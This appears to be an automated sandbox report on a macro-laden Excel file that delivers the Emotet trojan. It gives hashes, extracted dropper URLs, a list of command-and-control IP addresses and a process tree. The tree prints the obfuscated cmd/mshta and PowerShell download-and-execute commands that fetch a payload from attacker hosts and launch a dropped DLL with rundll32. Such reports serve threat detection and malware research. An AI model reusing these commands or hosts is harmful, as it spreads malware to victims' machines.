Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 19:38

General

  • Target

    IPVX_243334.xlsm

  • Size

    49KB

  • MD5

    e3d5be98c00a8e3a8d203fa438324b43

  • SHA1

    e42871e45dd9b4f206ab53e5f6e26321dd27fe80

  • SHA256

    1bccdaed8a9d03e7c5a5f0ecd9ca25e942077d1be538087e6451cc3030e37b8d

  • SHA512

    98efd7fcad036d523e7c76e327deebbe5dcac4941d12a2a8961518bd2eaef5782d2211a1b9d99094633fa10d4360cc80dc6e4536474c5c6b21196a17f62aac5e

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IPVX_243334.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1276
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe1.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe1.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1952
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1528
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:560
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mzqcddzegl\fodyzo.sci",WoIQotaJLTEz
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1352
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mzqcddzegl\fodyzo.sci",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1328

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • \Users\Public\Documents\ssd.dll
    MD5

    6d955d47992b3133eb24fc562d1c4955

    SHA1

    d44c73f72d44332f10b6968ae7b54667db2091c2

    SHA256

    8699d613132cdca97cfeaaaef039efc5f7c4674c1bb6c7ba2226c87bcd0467ed

    SHA512

    007fe1f28caa1c90b57f938e553f190f8b31dbc3dbf61f9bea07d2960c468096dba952442bc64cade5451d7e5c7f518af658f6f59ffceac797054ebdd78957a8

  • memory/560-81-0x0000000000290000-0x00000000002B8000-memory.dmp
    Filesize

    160KB

  • memory/560-83-0x0000000000430000-0x0000000000458000-memory.dmp
    Filesize

    160KB

  • memory/560-94-0x00000000028E0000-0x0000000002908000-memory.dmp
    Filesize

    160KB

  • memory/560-91-0x00000000027D0000-0x00000000027F8000-memory.dmp
    Filesize

    160KB

  • memory/560-89-0x00000000025B0000-0x00000000025D8000-memory.dmp
    Filesize

    160KB

  • memory/560-87-0x0000000002500000-0x0000000002528000-memory.dmp
    Filesize

    160KB

  • memory/560-85-0x0000000000B90000-0x0000000000BB8000-memory.dmp
    Filesize

    160KB

  • memory/1276-58-0x00000000756C1000-0x00000000756C3000-memory.dmp
    Filesize

    8KB

  • memory/1276-60-0x000000006B1A1000-0x000000006B1A3000-memory.dmp
    Filesize

    8KB

  • memory/1276-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1276-56-0x0000000070E71000-0x0000000070E73000-memory.dmp
    Filesize

    8KB

  • memory/1276-55-0x000000002FF51000-0x000000002FF54000-memory.dmp
    Filesize

    12KB

  • memory/1276-59-0x000000006B3A1000-0x000000006B3A3000-memory.dmp
    Filesize

    8KB

  • memory/1276-120-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1328-117-0x0000000002A80000-0x0000000002AA8000-memory.dmp
    Filesize

    160KB

  • memory/1328-119-0x0000000002F71000-0x0000000002F95000-memory.dmp
    Filesize

    144KB

  • memory/1328-111-0x00000000027B0000-0x00000000027D8000-memory.dmp
    Filesize

    160KB

  • memory/1328-115-0x0000000002930000-0x0000000002958000-memory.dmp
    Filesize

    160KB

  • memory/1328-113-0x0000000002890000-0x00000000028B8000-memory.dmp
    Filesize

    160KB

  • memory/1328-99-0x0000000000230000-0x0000000000258000-memory.dmp
    Filesize

    160KB

  • memory/1328-101-0x00000000003A0000-0x00000000003C8000-memory.dmp
    Filesize

    160KB

  • memory/1328-103-0x0000000000B20000-0x0000000000B48000-memory.dmp
    Filesize

    160KB

  • memory/1328-105-0x0000000000BF0000-0x0000000000C18000-memory.dmp
    Filesize

    160KB

  • memory/1328-107-0x0000000000C50000-0x0000000000C78000-memory.dmp
    Filesize

    160KB

  • memory/1328-109-0x0000000002590000-0x00000000025B8000-memory.dmp
    Filesize

    160KB

  • memory/1352-96-0x0000000000300000-0x0000000000328000-memory.dmp
    Filesize

    160KB

  • memory/1528-74-0x00000000001E0000-0x0000000000208000-memory.dmp
    Filesize

    160KB

  • memory/1884-67-0x0000000004BF0000-0x0000000005241000-memory.dmp
    Filesize

    6.3MB

  • memory/1884-66-0x0000000001E32000-0x0000000001E34000-memory.dmp
    Filesize

    8KB

  • memory/1884-65-0x0000000001E31000-0x0000000001E32000-memory.dmp
    Filesize

    4KB

  • memory/1884-64-0x0000000001E30000-0x0000000001E31000-memory.dmp
    Filesize

    4KB